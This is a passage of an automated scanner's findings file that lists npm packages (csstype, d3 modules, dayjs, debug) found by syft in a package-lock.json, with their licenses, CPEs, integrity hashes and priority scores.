SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: csstype 3.2.3' + title: csstype 3.2.3 + description: 'Package discovered: csstype 3.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7a5abc30c1904007 + name: csstype + version: 3.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/csstype@3.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz + integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bd9d3c33974e198d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-array 3.2.4' + title: d3-array 3.2.4 + description: 'Package discovered: d3-array 3.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d16a22647e62d254 + name: d3-array + version: 3.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-array@3.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz + integrity: sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg== + dependencies: + internmap: 1 - 2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fe81bed2b7c1ca62 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-color 3.1.0' + title: d3-color 3.1.0 + description: 'Package discovered: d3-color 3.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 633ef642a5395c1a + name: d3-color + version: 3.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-color@3.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz + integrity: sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d9ebb131f790b372 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-ease 3.0.1' + title: d3-ease 3.0.1 + description: 'Package discovered: d3-ease 3.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5c5a953bcb066b0e + name: d3-ease + version: 3.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-ease@3.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz + integrity: sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fe1c10f297b89c50 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-format 3.1.2' + title: d3-format 3.1.2 + description: 'Package discovered: d3-format 3.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5199669646af57ab + name: d3-format + version: 3.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-format@3.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz + integrity: sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d580ebf8b65eecc5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-interpolate 3.0.1' + title: d3-interpolate 3.0.1 + description: 'Package discovered: d3-interpolate 3.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2bcd6b2445ac379d + name: d3-interpolate + version: 3.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-interpolate@3.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz + integrity: sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g== + dependencies: + d3-color: 1 - 3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9d53314d3544b04e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-path 3.1.0' + title: d3-path 3.1.0 + description: 'Package discovered: d3-path 3.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 63d3c4d24d9be1d5 + name: d3-path + version: 3.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-path@3.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz + integrity: sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 964951e667c4c379 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-scale 4.0.2' + title: d3-scale 4.0.2 + description: 'Package discovered: d3-scale 4.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6f08c8eb1953f0ad + name: d3-scale + version: 4.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-scale@4.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz + integrity: sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ== + dependencies: + d3-array: 2.10.0 - 3 + d3-format: 1 - 3 + d3-interpolate: 1.2.0 - 3 + d3-time: 2.1.1 - 3 + d3-time-format: 2 - 4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fdbd8e26e660bbf2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-shape 3.2.0' + title: d3-shape 3.2.0 + description: 'Package discovered: d3-shape 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 62919ef646dbae92 + name: d3-shape + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-shape@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz + integrity: sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA== + dependencies: + d3-path: ^3.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 53764226f7fa140f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-time 3.1.0' + title: d3-time 3.1.0 + description: 'Package discovered: d3-time 3.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 809edf0f6cbf0d31 + name: d3-time + version: 3.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-time@3.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz + integrity: sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q== + dependencies: + d3-array: 2 - 3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e86c38bd447bf3a0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-time-format 4.1.0' + title: d3-time-format 4.1.0 + description: 'Package discovered: d3-time-format 4.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4c75f293b12c6086 + name: d3-time-format + version: 4.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-time-format@4.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz + integrity: sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg== + dependencies: + d3-time: 1 - 3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 014411da08f2c5cc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: d3-timer 3.0.1' + title: d3-timer 3.0.1 + description: 'Package discovered: d3-timer 3.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1f58b04c062182d6 + name: d3-timer + version: 3.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/d3-timer@3.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz + integrity: sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8491d2589d2b26fe + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dayjs 1.11.20' + title: dayjs 1.11.20 + description: 'Package discovered: dayjs 1.11.20' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 11ebb955a4940d8a + name: dayjs + version: 1.11.20 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dayjs@1.11.20 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz + integrity: sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3e4836eb16baaf2c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: debug 2.6.9' + title: debug 2.6.9 + description: 'Package discovered: debug 2.6.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 791d0c8d38a3b042 + name: debug + version: 2.6.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/debug@2.6.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/debug/-/debug-2.6.9.tgz + integrity: sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA== + dependencies: + ms: 2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c3870af17f8e7246 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: debug 4.4.3' + title: debug 4.4.3 + description: 'Package discovered: debug 4.4.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 96b0606cb5228062 + name: debug + version: 4.4.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/debug@4.4.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/debug/-/debug-4.4.3.tgz + integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA== + dependencies: + ms: ^2.1.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + 